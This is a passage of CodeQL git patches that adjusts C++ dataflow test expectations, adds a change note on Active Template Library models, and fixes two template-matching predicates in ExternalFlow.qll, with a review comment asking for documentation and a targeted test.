| test_strndupa | 0 | int | +| taint.cpp:419:7:419:7 | MyClass2 | 0 | MyClass2 && | +| taint.cpp:419:7:419:7 | MyClass2 | 0 | const MyClass2 & | +| taint.cpp:419:7:419:7 | operator= | 0 | MyClass2 && | +| taint.cpp:419:7:419:7 | operator= | 0 | const MyClass2 & | +| taint.cpp:421:2:421:9 | MyClass2 | 0 | int | +| taint.cpp:422:7:422:15 | setMember | 0 | int | +| taint.cpp:428:7:428:7 | MyClass3 | 0 | MyClass3 && | +| taint.cpp:428:7:428:7 | MyClass3 | 0 | const MyClass3 & | +| taint.cpp:428:7:428:7 | operator= | 0 | MyClass3 && | +| taint.cpp:428:7:428:7 | operator= | 0 | const MyClass3 & | +| taint.cpp:430:2:430:9 | MyClass3 | 0 | const char * | +| taint.cpp:431:7:431:15 | setString | 0 | const char * | +| taint.cpp:474:6:474:9 | swop | 0 | int & | +| taint.cpp:474:6:474:9 | swop | 1 | int & | +| taint.cpp:500:5:500:12 | getdelim | 0 | char ** | +| taint.cpp:500:5:500:12 | getdelim | 1 | size_t * | +| taint.cpp:500:5:500:12 | getdelim | 2 | int | +| taint.cpp:500:5:500:12 | getdelim | 3 | FILE * | +| taint.cpp:502:6:502:18 | test_getdelim | 0 | FILE * | +| taint.cpp:512:7:512:12 | strtok | 0 | char * | +| taint.cpp:512:7:512:12 | strtok | 1 | const char * | +| taint.cpp:514:6:514:16 | test_strtok | 0 | char * | +| taint.cpp:523:7:523:13 | _strset | 0 | char * | +| taint.cpp:523:7:523:13 | _strset | 1 | int | +| taint.cpp:525:6:525:18 | test_strset_1 | 0 | char * | +| taint.cpp:525:6:525:18 | test_strset_1 | 1 | char | +| taint.cpp:531:6:531:18 | test_strset_2 | 0 | char * | +| taint.cpp:538:7:538:13 | mempcpy | 0 | void * | +| taint.cpp:538:7:538:13 | mempcpy | 1 | const void * | +| taint.cpp:538:7:538:13 | mempcpy | 2 | size_t | +| taint.cpp:540:6:540:17 | test_mempcpy | 0 | int * | +| taint.cpp:548:7:548:13 | memccpy | 0 | void * | +| taint.cpp:548:7:548:13 | memccpy | 1 | const void * | +| taint.cpp:548:7:548:13 | memccpy | 2 | int | +| taint.cpp:548:7:548:13 | memccpy | 3 | size_t | +| taint.cpp:550:6:550:17 | test_memccpy | 0 | int * | +| 
taint.cpp:558:7:558:12 | strcat | 0 | char * | +| taint.cpp:558:7:558:12 | strcat | 1 | const char * | +| taint.cpp:560:6:560:16 | test_strcat | 0 | char * | +| taint.cpp:560:6:560:16 | test_strcat | 1 | char * | +| taint.cpp:560:6:560:16 | test_strcat | 2 | char * | +| taint.cpp:560:6:560:16 | test_strcat | 3 | char * | +| taint.cpp:570:16:570:25 | _mbsncat_l | 0 | unsigned char * | +| taint.cpp:570:16:570:25 | _mbsncat_l | 1 | const unsigned char * | +| taint.cpp:570:16:570:25 | _mbsncat_l | 2 | int | +| taint.cpp:570:16:570:25 | _mbsncat_l | 3 | _locale_t | +| taint.cpp:572:6:572:20 | test__mbsncat_l | 0 | unsigned char * | +| taint.cpp:572:6:572:20 | test__mbsncat_l | 1 | const unsigned char * | +| taint.cpp:572:6:572:20 | test__mbsncat_l | 2 | unsigned char * | +| taint.cpp:572:6:572:20 | test__mbsncat_l | 3 | _locale_t | +| taint.cpp:572:6:572:20 | test__mbsncat_l | 4 | _locale_t | +| taint.cpp:572:6:572:20 | test__mbsncat_l | 5 | int | +| taint.cpp:589:7:589:12 | strsep | 0 | char ** | +| taint.cpp:589:7:589:12 | strsep | 1 | const char * | +| taint.cpp:591:6:591:16 | test_strsep | 0 | char * | +| taint.cpp:602:7:602:13 | _strinc | 0 | const char * | +| taint.cpp:602:7:602:13 | _strinc | 1 | _locale_t | +| taint.cpp:603:16:603:22 | _mbsinc | 0 | const unsigned char * | +| taint.cpp:604:16:604:22 | _strdec | 0 | const unsigned char * | +| taint.cpp:604:16:604:22 | _strdec | 1 | const unsigned char * | +| taint.cpp:606:6:606:17 | test__strinc | 0 | char * | +| taint.cpp:606:6:606:17 | test__strinc | 1 | char * | +| taint.cpp:606:6:606:17 | test__strinc | 2 | char * | +| taint.cpp:606:6:606:17 | test__strinc | 3 | char * | +| taint.cpp:606:6:606:17 | test__strinc | 4 | _locale_t | +| taint.cpp:616:6:616:17 | test__mbsinc | 0 | unsigned char * | +| taint.cpp:616:6:616:17 | test__mbsinc | 1 | char * | +| taint.cpp:616:6:616:17 | test__mbsinc | 2 | unsigned char * | +| taint.cpp:616:6:616:17 | test__mbsinc | 3 | char * | +| taint.cpp:626:6:626:17 | test__strdec | 
0 | const unsigned char * | +| taint.cpp:626:6:626:17 | test__strdec | 1 | unsigned char * | +| taint.cpp:626:6:626:17 | test__strdec | 2 | unsigned char * | +| taint.cpp:626:6:626:17 | test__strdec | 3 | unsigned char * | +| taint.cpp:626:6:626:17 | test__strdec | 4 | unsigned char * | +| taint.cpp:645:14:645:22 | _strnextc | 0 | const char * | +| taint.cpp:647:6:647:19 | test__strnextc | 0 | const char * | +| taint.cpp:659:7:659:7 | operator= | 0 | C_no_const_member_function && | +| taint.cpp:659:7:659:7 | operator= | 0 | const C_no_const_member_function & | +| taint.cpp:665:6:665:25 | test_no_const_member | 0 | char * | +| taint.cpp:671:7:671:7 | operator= | 0 | C_const_member_function && | +| taint.cpp:671:7:671:7 | operator= | 0 | const C_const_member_function & | +| taint.cpp:677:6:677:27 | test_with_const_member | 0 | char * | +| taint.cpp:683:6:683:20 | argument_source | 0 | void * | +| taint.cpp:685:8:685:8 | operator= | 0 | const two_members & | +| taint.cpp:685:8:685:8 | operator= | 0 | two_members && | +| taint.cpp:707:8:707:14 | strncpy | 0 | char * | +| taint.cpp:707:8:707:14 | strncpy | 1 | const char * | +| taint.cpp:707:8:707:14 | strncpy | 2 | unsigned long | +| taint.cpp:709:6:709:17 | test_strncpy | 0 | char * | +| taint.cpp:709:6:709:17 | test_strncpy | 1 | char * | +| taint.cpp:725:10:725:15 | strtol | 0 | const char * | +| taint.cpp:725:10:725:15 | strtol | 1 | char ** | +| taint.cpp:725:10:725:15 | strtol | 2 | int | +| taint.cpp:727:6:727:16 | test_strtol | 0 | char * | +| taint.cpp:735:7:735:12 | malloc | 0 | size_t | +| taint.cpp:736:7:736:13 | realloc | 0 | void * | +| taint.cpp:736:7:736:13 | realloc | 1 | size_t | +| taint.cpp:744:6:744:32 | test_realloc_2_indirections | 0 | int ** | +| taint.cpp:751:9:751:9 | operator= | 0 | A && | +| taint.cpp:751:9:751:9 | operator= | 0 | const A & | +| taint.cpp:758:5:758:11 | sprintf | 0 | char * | +| taint.cpp:758:5:758:11 | sprintf | 1 | const char * | +| taint.cpp:760:6:760:23 | 
call_sprintf_twice | 0 | char * | +| taint.cpp:760:6:760:23 | call_sprintf_twice | 1 | char * | +| taint.cpp:771:8:771:8 | operator= | 0 | TaintInheritingContentObject && | +| taint.cpp:771:8:771:8 | operator= | 0 | const TaintInheritingContentObject & | +| taint.cpp:775:30:775:35 | source | 0 | bool | +| taint.cpp:782:7:782:11 | fopen | 0 | const char * | +| taint.cpp:782:7:782:11 | fopen | 1 | const char * | +| taint.cpp:783:5:783:11 | fopen_s | 0 | FILE ** | +| taint.cpp:783:5:783:11 | fopen_s | 1 | const char * | +| taint.cpp:783:5:783:11 | fopen_s | 2 | const char * | +| taint.cpp:785:6:785:15 | fopen_test | 0 | char * | +| vector.cpp:13:6:13:9 | sink | 0 | int | +| vector.cpp:14:27:14:30 | sink | 0 | vector, allocator>, allocator, allocator>>> & | | vector.cpp:14:27:14:30 | sink | 0 | vector> & | | vector.cpp:14:27:14:30 | sink | 0 | vector> & | +| vector.cpp:16:6:16:37 | test_range_based_for_loop_vector | 0 | int | +| vector.cpp:37:6:37:23 | test_element_taint | 0 | int | +| vector.cpp:145:8:145:8 | operator= | 0 | MyPair && | +| vector.cpp:145:8:145:8 | operator= | 0 | const MyPair & | +| vector.cpp:150:8:150:8 | MyVectorContainer | 0 | const MyVectorContainer & | +| vector.cpp:150:8:150:8 | operator= | 0 | MyVectorContainer && | +| vector.cpp:150:8:150:8 | operator= | 0 | const MyVectorContainer & | +| vector.cpp:216:6:216:9 | sink | 0 | iterator & | +| vector.cpp:231:6:231:9 | sink | 0 | vector> & | +| vector.cpp:232:6:232:9 | sink | 0 | vector> & | +| vector.cpp:279:6:279:9 | sink | 0 | int * | +| vector.cpp:295:6:295:9 | sink | 0 | iterator | +| vector.cpp:329:6:329:33 | taint_vector_output_iterator | 0 | iterator | +| vector.cpp:333:6:333:35 | vector_iterator_assign_wrapper | 0 | iterator | +| vector.cpp:333:6:333:35 | vector_iterator_assign_wrapper | 1 | int | +| vector.cpp:337:6:337:32 | test_vector_output_iterator | 0 | int | +| vector.cpp:417:6:417:25 | test_vector_inserter | 0 | char * | +| vector.cpp:454:7:454:12 | memcpy | 0 | void * | +| 
vector.cpp:454:7:454:12 | memcpy | 1 | const void * | +| vector.cpp:454:7:454:12 | memcpy | 2 | size_t | +| vector.cpp:461:6:461:9 | sink | 0 | vector> & | +| vector.cpp:462:6:462:9 | sink | 0 | string & | +| zmq.cpp:9:8:9:8 | operator= | 0 | const zmq_msg_t & | +| zmq.cpp:9:8:9:8 | operator= | 0 | zmq_msg_t && | +| zmq.cpp:14:5:14:21 | zmq_msg_init_data | 0 | zmq_msg_t * | +| zmq.cpp:14:5:14:21 | zmq_msg_init_data | 1 | void * | +| zmq.cpp:14:5:14:21 | zmq_msg_init_data | 2 | size_t | +| zmq.cpp:14:5:14:21 | zmq_msg_init_data | 3 | zmq_free_fn * | +| zmq.cpp:14:5:14:21 | zmq_msg_init_data | 4 | void * | +| zmq.cpp:15:7:15:18 | zmq_msg_data | 0 | zmq_msg_t * | +| zmq.cpp:17:6:17:13 | test_zmc | 0 | void * | +| zmq.cpp:17:6:17:13 | test_zmc | 1 | char * | +| zmq.cpp:17:6:17:13 | test_zmc | 2 | size_t | From 02428745bdf126588ddb42522042dfa78a46ee67 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 16:12:58 +0000 Subject: [PATCH 0752/1267] C++: Add change note. --- cpp/ql/src/change-notes/2024-11-27-active-template-library.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 cpp/ql/src/change-notes/2024-11-27-active-template-library.md diff --git a/cpp/ql/src/change-notes/2024-11-27-active-template-library.md b/cpp/ql/src/change-notes/2024-11-27-active-template-library.md new file mode 100644 index 00000000000..a677ac66107 --- /dev/null +++ b/cpp/ql/src/change-notes/2024-11-27-active-template-library.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* Added dataflow models and flow sources for Microsoft's Active Template Library (ATL). \ No newline at end of file From 3c0af498db588c2fd3974fd64f58687b33360581 Mon Sep 17 00:00:00 2001 
From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 19:04:25 +0000 Subject: [PATCH 0753/1267] C++: Fix bug introduced in an earlier commit and accept test changes. They all look good. --- .../semmle/code/cpp/dataflow/ExternalFlow.qll | 4 +- .../taint-tests/test_mad-signatures.expected | 193 ------------------ 2 files changed, 2 insertions(+), 195 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll index ac10651b551..9496bfe98ba 100644 --- a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll +++ b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll @@ -437,13 +437,13 @@ private predicate elementSpec( private predicate isClassConstructedFrom(Class c, Class templateClass) { c.isConstructedFrom(templateClass) or - not any(Class c_).isConstructedFrom(templateClass) and c = templateClass + not c.isConstructedFrom(_) and c = templateClass } private predicate isFunctionConstructedFrom(Function f, Function templateFunc) { f.isConstructedFrom(templateFunc) or - not any(Function f_).isConstructedFrom(templateFunc) and f = templateFunc + not f.isConstructedFrom(_) and f = templateFunc } /** Gets the fully templated version of `f`. */ diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected index 1f84cd3379a..0d121219209 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected 
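Review bot: The fallback disjunct in `isClassConstructedFrom` and `isFunctionConstructedFrom` (`not c.isConstructedFrom(_) and c = templateClass`, and the `f` equivalent) is the part this commit corrects, yet neither predicate has QLDoc saying which case it is meant to cover. I would add above the first something like `/** Holds if c is an instantiation of templateClass, or c is not an instantiation of anything and is templateClass itself. */`, with the matching comment on the function variant. These predicates appear to decide which declarations a flow-model row in ExternalFlow.qll attaches to, so a wrong condition here would surface only as extra or missing `signatureMatches` rows in the .expected file, meaning spurious or missed taint flow in the queries built on it. A small targeted test with one template that has instantiations and one that has none would pin the intended behaviour more directly than the 193-row expectation diff.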
@@ -76,15 +76,6 @@ signatureMatches | constructor_delegation.cpp:10:2:10:8 | MyValue | (LPCOLESTR,int) | CComBSTR | Append | 1 | | constructor_delegation.cpp:19:2:19:15 | MyDerivedValue | (LPCOLESTR,int) | CComBSTR | Append | 1 | | standalone_iterators.cpp:103:27:103:36 | operator+= | (LPCOLESTR,int) | CComBSTR | Append | 1 | -| stl.h:165:8:165:16 | push_back | (char) | CComBSTR | Append | 0 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | deque | assign | 0 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | deque | assign | 1 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | forward_list | assign | 0 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | forward_list | assign | 1 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | list | assign | 0 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | list | assign | 1 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | vector | assign | 0 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | vector | assign | 1 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | deque | assign | 0 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | deque | assign | 1 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | forward_list | assign | 0 | 
@@ -93,14 +84,6 @@ signatureMatches | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | list | assign | 1 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | vector | assign | 0 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | vector | assign | 1 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | deque | assign | 0 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | deque | assign | 1 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | forward_list | assign | 0 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | forward_list | assign | 1 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | list | assign | 0 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | list | assign | 1 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | vector | assign | 0 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | vector | assign | 1 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | deque | assign | 0 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | deque | assign | 1 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | forward_list | assign | 0 | 
@@ -109,18 +92,6 @@ signatureMatches | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | list | assign | 1 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | vector | assign | 0 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | vector | assign | 1 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | deque | insert | 0 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | deque | insert | 1 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | deque | insert | 2 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | forward_list | insert_after | 0 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | forward_list | insert_after | 1 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | forward_list | insert_after | 2 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | list | insert | 0 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | list | insert | 1 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | list | insert | 2 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | vector | insert | 0 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | vector | insert | 1 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | vector | insert | 2 | | stl.h:190:17:190:23 | replace | (const_iterator,InputIt,InputIt) | deque | insert | 0 | | stl.h:190:17:190:23 | replace | (const_iterator,InputIt,InputIt) | deque | insert | 1 | | stl.h:190:17:190:23 | replace | (const_iterator,InputIt,InputIt) | deque | insert | 2 | 
@@ -561,13 +532,10 @@ getParameterTypeName | atl.cpp:69:3:69:15 | _U_STRINGorID | 0 | LPCTSTR | | atl.cpp:193:10:193:12 | Add | 0 | INARGTYPclass:0 | | atl.cpp:195:10:195:15 | Append | 0 | const CAtlArray & | -| atl.cpp:195:10:195:15 | Append | 0 | const CAtlArray> & | | atl.cpp:196:8:196:11 | Copy | 0 | const CAtlArray & | -| atl.cpp:196:8:196:11 | Copy | 0 | const CAtlArray> & | | atl.cpp:198:6:198:10 | GetAt | 0 | size_t | | atl.cpp:202:8:202:20 | InsertArrayAt | 0 | size_t | | atl.cpp:202:8:202:20 | InsertArrayAt | 1 | const CAtlArray * | -| atl.cpp:202:8:202:20 | InsertArrayAt | 1 | const CAtlArray> * | | atl.cpp:203:8:203:15 | InsertAt | 0 | size_t | | atl.cpp:203:8:203:15 | InsertAt | 1 | INARGTYPclass:0 | | atl.cpp:203:8:203:15 | InsertAt | 2 | size_t | @@ -577,10 +545,8 @@ getParameterTypeName | atl.cpp:256:3:256:10 | CAtlList | 0 | UINT | | atl.cpp:259:12:259:18 | AddHead | 0 | INARGTYPclass:0 | | atl.cpp:260:8:260:18 | AddHeadList | 0 | const CAtlList * | -| atl.cpp:260:8:260:18 | AddHeadList | 0 | const CAtlList> * | | atl.cpp:262:12:262:18 | AddTail | 0 | INARGTYPclass:0 | | atl.cpp:263:8:263:18 | AddTailList | 0 | const CAtlList * | -| atl.cpp:263:8:263:18 | AddTailList | 0 | const CAtlList> * | | atl.cpp:264:12:264:15 | Find | 0 | INARGTYPclass:0 | | atl.cpp:264:12:264:15 | Find | 1 | POSITION | | atl.cpp:265:12:265:20 | FindIndex | 0 | size_t | 
@@ -633,12 +599,10 @@ getParameterTypeName | atl.cpp:537:3:537:15 | CComSafeArray | 0 | const SAFEARRAY * | | atl.cpp:541:11:541:13 | Add | 0 | const SAFEARRAY * | | atl.cpp:543:11:543:13 | Add | 0 | const class:0 & | -| atl.cpp:543:11:543:13 | Add | 0 | const int & | | atl.cpp:543:11:543:13 | Add | 1 | BOOL | | atl.cpp:551:6:551:10 | GetAt | 0 | LONG | | atl.cpp:562:11:562:15 | SetAt | 0 | LONG | | atl.cpp:562:11:562:15 | SetAt | 1 | const class:0 & | -| atl.cpp:562:11:562:15 | SetAt | 1 | const int & | | atl.cpp:562:11:562:15 | SetAt | 2 | BOOL | | atl.cpp:564:6:564:15 | operator[] | 0 | long | | atl.cpp:565:6:565:15 | operator[] | 0 | int | 
@@ -651,33 +615,21 @@ getParameterTypeName | atl.cpp:619:22:619:33 | CommonPrefix | 0 | PCXSTR | | atl.cpp:656:23:656:32 | operator+= | 0 | PCXSTR | | atl.cpp:716:8:716:10 | Add | 0 | const class:0 & | -| atl.cpp:716:8:716:10 | Add | 0 | const int & | | atl.cpp:717:7:717:10 | Find | 0 | const class:0 & | -| atl.cpp:717:7:717:10 | Find | 0 | const int & | | atl.cpp:728:6:728:15 | operator[] | 0 | int | | atl.cpp:729:21:729:29 | operator= | 0 | const CSimpleArray & | -| atl.cpp:762:8:762:10 | Add | 0 | char *const & | | atl.cpp:762:8:762:10 | Add | 0 | const class:0 & | | atl.cpp:762:8:762:10 | Add | 1 | const class:1 & | -| atl.cpp:762:8:762:10 | Add | 1 | wchar_t *const & | -| atl.cpp:763:7:763:13 | FindKey | 0 | char *const & | | atl.cpp:763:7:763:13 | FindKey | 0 | const class:0 & | | atl.cpp:764:7:764:13 | FindVal | 0 | const class:1 & | -| atl.cpp:764:7:764:13 | FindVal | 0 | wchar_t *const & | | atl.cpp:767:9:767:18 | GetValueAt | 0 | int | -| atl.cpp:768:8:768:13 | Lookup | 0 | char *const & | | atl.cpp:768:8:768:13 | Lookup | 0 | const class:0 & | | atl.cpp:772:8:772:20 | ReverseLookup | 0 | const class:1 & | -| atl.cpp:772:8:772:20 | ReverseLookup | 0 | wchar_t *const & | -| atl.cpp:773:8:773:12 | SetAt | 0 | char *const & | | atl.cpp:773:8:773:12 | SetAt | 0 | const class:0 & | | atl.cpp:773:8:773:12 | SetAt | 1 | const class:1 & | -| atl.cpp:773:8:773:12 | SetAt | 1 | wchar_t *const & | | atl.cpp:774:8:774:17 | SetAtIndex | 0 | int | -| atl.cpp:774:8:774:17 | SetAtIndex | 1 | char *const & | | atl.cpp:774:8:774:17 | SetAtIndex | 1 | const class:0 & | | atl.cpp:774:8:774:17 | SetAtIndex | 2 | const class:1 & | -| atl.cpp:774:8:774:17 | SetAtIndex | 2 | wchar_t *const & | | atl.cpp:813:9:813:17 | operator= | 0 | const CUrl & | | atl.cpp:815:3:815:6 | CUrl | 0 | const CUrl & | | atl.cpp:818:15:818:26 | Canonicalize | 0 | DWORD | 
@@ -826,7 +778,6 @@ getParameterTypeName | stl.h:29:34:29:40 | forward | 0 | remove_reference_t & | | stl.h:29:34:29:40 | forward | 0 | remove_reference_t & | | stl.h:29:34:29:40 | forward | 0 | remove_reference_t & | -| stl.h:29:34:29:40 | forward | 0 | remove_reference_t> & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | @@ -835,8 +786,6 @@ getParameterTypeName | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | -| stl.h:49:3:49:10 | iterator | 0 | const iterator, ptrdiff_t, pair *, pair &> & | -| stl.h:49:3:49:10 | iterator | 0 | const iterator, ptrdiff_t, pair *, pair &> & | | stl.h:52:12:52:21 | operator++ | 0 | int | | stl.h:52:12:52:21 | operator++ | 0 | int | | stl.h:52:12:52:21 | operator++ | 0 | int | @@ -849,7 +798,6 @@ getParameterTypeName | stl.h:56:8:56:17 | operator!= | 0 | iterator | | stl.h:56:8:56:17 | operator!= | 0 | iterator | | stl.h:56:8:56:17 | operator!= | 0 | iterator | -| stl.h:56:8:56:17 | operator!= | 0 | iterator, ptrdiff_t, pair *, pair &> | | stl.h:59:12:59:20 | operator+ | 0 | int | | stl.h:60:12:60:20 | operator- | 0 | int | | stl.h:61:13:61:22 | operator+= | 0 | int | 
@@ -868,92 +816,51 @@ getParameterTypeName | stl.h:72:9:72:9 | operator= | 0 | output_iterator_tag && | | stl.h:86:22:86:41 | back_insert_iterator | 0 | class:0 & | | stl.h:86:22:86:41 | back_insert_iterator | 0 | class:0 & | -| stl.h:86:22:86:41 | back_insert_iterator | 0 | vector, allocator>, allocator, allocator>>> & | -| stl.h:86:22:86:41 | back_insert_iterator | 0 | vector> & | | stl.h:88:25:88:33 | operator= | 0 | value_type && | | stl.h:88:25:88:33 | operator= | 0 | value_type && | | stl.h:91:24:91:33 | operator++ | 0 | int | | stl.h:91:24:91:33 | operator++ | 0 | int | | stl.h:95:44:95:44 | back_inserter | 0 | func:0 & | | stl.h:95:44:95:44 | back_inserter | 0 | func:0 & | -| stl.h:95:44:95:44 | back_inserter | 0 | vector, allocator>, allocator, allocator>>> & | -| stl.h:95:44:95:44 | back_inserter | 0 | vector> & | -| stl.h:147:12:147:23 | basic_string | 0 | const allocator & | -| stl.h:148:3:148:14 | basic_string | 0 | const char * | | stl.h:148:3:148:14 | basic_string | 0 | const class:2 & | -| stl.h:148:3:148:14 | basic_string | 1 | const allocator & | | stl.h:149:33:149:44 | basic_string | 0 | const class:0 * | -| stl.h:149:33:149:44 | basic_string | 0 | func:0 | | stl.h:149:33:149:44 | basic_string | 1 | const class:2 & | -| stl.h:149:33:149:44 | basic_string | 1 | func:0 | -| stl.h:149:33:149:44 | basic_string | 2 | const allocator & | | stl.h:151:16:151:20 | c_str | 0 | func:0 | | stl.h:151:16:151:20 | c_str | 1 | func:0 | | stl.h:151:16:151:20 | c_str | 2 | const class:2 & | -| stl.h:165:8:165:16 | push_back | 0 | char | | stl.h:173:13:173:22 | operator[] | 0 | size_type | | stl.h:175:13:175:14 | at | 0 | size_type | -| stl.h:176:35:176:44 | operator+= | 0 | const func:0 & | -| stl.h:176:35:176:44 | operator+= | 0 | const func:0 & | | stl.h:176:35:176:44 | operator+= | 0 | size_type | | stl.h:176:35:176:44 | operator+= | 0 | size_type | -| stl.h:177:17:177:26 | operator+= | 0 | const char * | | stl.h:177:17:177:26 | operator+= | 0 | const func:0 & 
| -| stl.h:178:17:178:22 | append | 0 | const basic_string, allocator> & | | stl.h:178:17:178:22 | append | 0 | const class:0 * | | stl.h:179:17:179:22 | append | 0 | const basic_string & | -| stl.h:179:17:179:22 | append | 0 | const char * | | stl.h:180:17:180:22 | append | 0 | const class:0 * | -| stl.h:180:17:180:22 | append | 0 | size_type | -| stl.h:180:17:180:22 | append | 1 | char | -| stl.h:181:47:181:52 | append | 0 | func:0 | | stl.h:181:47:181:52 | append | 0 | size_type | | stl.h:181:47:181:52 | append | 1 | class:0 | -| stl.h:181:47:181:52 | append | 1 | func:0 | -| stl.h:182:17:182:22 | assign | 0 | const basic_string, allocator> & | | stl.h:182:17:182:22 | assign | 0 | func:0 | | stl.h:182:17:182:22 | assign | 1 | func:0 | | stl.h:183:17:183:22 | assign | 0 | const basic_string & | -| stl.h:183:17:183:22 | assign | 0 | size_type | -| stl.h:183:17:183:22 | assign | 1 | char | -| stl.h:184:47:184:52 | assign | 0 | func:0 | | stl.h:184:47:184:52 | assign | 0 | size_type | | stl.h:184:47:184:52 | assign | 1 | class:0 | -| stl.h:184:47:184:52 | assign | 1 | func:0 | | stl.h:185:17:185:22 | insert | 0 | func:0 | -| stl.h:185:17:185:22 | insert | 0 | size_type | -| stl.h:185:17:185:22 | insert | 1 | const basic_string, allocator> & | | stl.h:185:17:185:22 | insert | 1 | func:0 | | stl.h:186:17:186:22 | insert | 0 | size_type | | stl.h:186:17:186:22 | insert | 1 | const basic_string & | -| stl.h:186:17:186:22 | insert | 1 | size_type | -| stl.h:186:17:186:22 | insert | 2 | char | | stl.h:187:17:187:22 | insert | 0 | size_type | -| stl.h:187:17:187:22 | insert | 1 | const char * | | stl.h:187:17:187:22 | insert | 1 | size_type | | stl.h:187:17:187:22 | insert | 2 | class:0 | -| stl.h:188:12:188:17 | insert | 0 | const_iterator | | stl.h:188:12:188:17 | insert | 0 | size_type | | stl.h:188:12:188:17 | insert | 1 | const class:0 * | -| stl.h:188:12:188:17 | insert | 1 | size_type | -| stl.h:188:12:188:17 | insert | 2 | char | | stl.h:189:42:189:47 | insert | 0 
| const_iterator | -| stl.h:189:42:189:47 | insert | 1 | func:0 | | stl.h:189:42:189:47 | insert | 1 | size_type | | stl.h:189:42:189:47 | insert | 2 | class:0 | -| stl.h:189:42:189:47 | insert | 2 | func:0 | | stl.h:190:17:190:23 | replace | 0 | const_iterator | -| stl.h:190:17:190:23 | replace | 0 | size_type | | stl.h:190:17:190:23 | replace | 1 | func:0 | -| stl.h:190:17:190:23 | replace | 1 | size_type | -| stl.h:190:17:190:23 | replace | 2 | const basic_string, allocator> & | | stl.h:190:17:190:23 | replace | 2 | func:0 | | stl.h:191:17:191:23 | replace | 0 | size_type | | stl.h:191:17:191:23 | replace | 1 | size_type | | stl.h:191:17:191:23 | replace | 2 | const basic_string & | -| stl.h:191:17:191:23 | replace | 2 | size_type | -| stl.h:191:17:191:23 | replace | 3 | char | -| stl.h:192:13:192:16 | copy | 0 | char * | | stl.h:192:13:192:16 | copy | 0 | size_type | | stl.h:192:13:192:16 | copy | 1 | size_type | | stl.h:192:13:192:16 | copy | 2 | size_type | 
@@ -961,18 +868,11 @@ getParameterTypeName | stl.h:193:8:193:12 | clear | 0 | class:0 * | | stl.h:193:8:193:12 | clear | 1 | size_type | | stl.h:193:8:193:12 | clear | 2 | size_type | -| stl.h:194:16:194:21 | substr | 0 | size_type | -| stl.h:194:16:194:21 | substr | 1 | size_type | -| stl.h:195:8:195:11 | swap | 0 | basic_string, allocator> & | | stl.h:195:8:195:11 | swap | 0 | size_type | | stl.h:195:8:195:11 | swap | 1 | size_type | | stl.h:198:94:198:102 | operator+ | 0 | const basic_string & | -| stl.h:198:94:198:102 | operator+ | 0 | const basic_string, allocator> & | | stl.h:198:94:198:102 | operator+ | 1 | const basic_string & | -| stl.h:198:94:198:102 | operator+ | 1 | const basic_string, allocator> & | | stl.h:199:94:199:102 | operator+ | 0 | const basic_string & | -| stl.h:199:94:199:102 | operator+ | 0 | const basic_string, allocator> & | -| stl.h:199:94:199:102 | operator+ | 1 | const char * | | stl.h:199:94:199:102 | operator+ | 1 | const func:0 * | | stl.h:214:33:214:42 | operator>> | 0 | int & | | 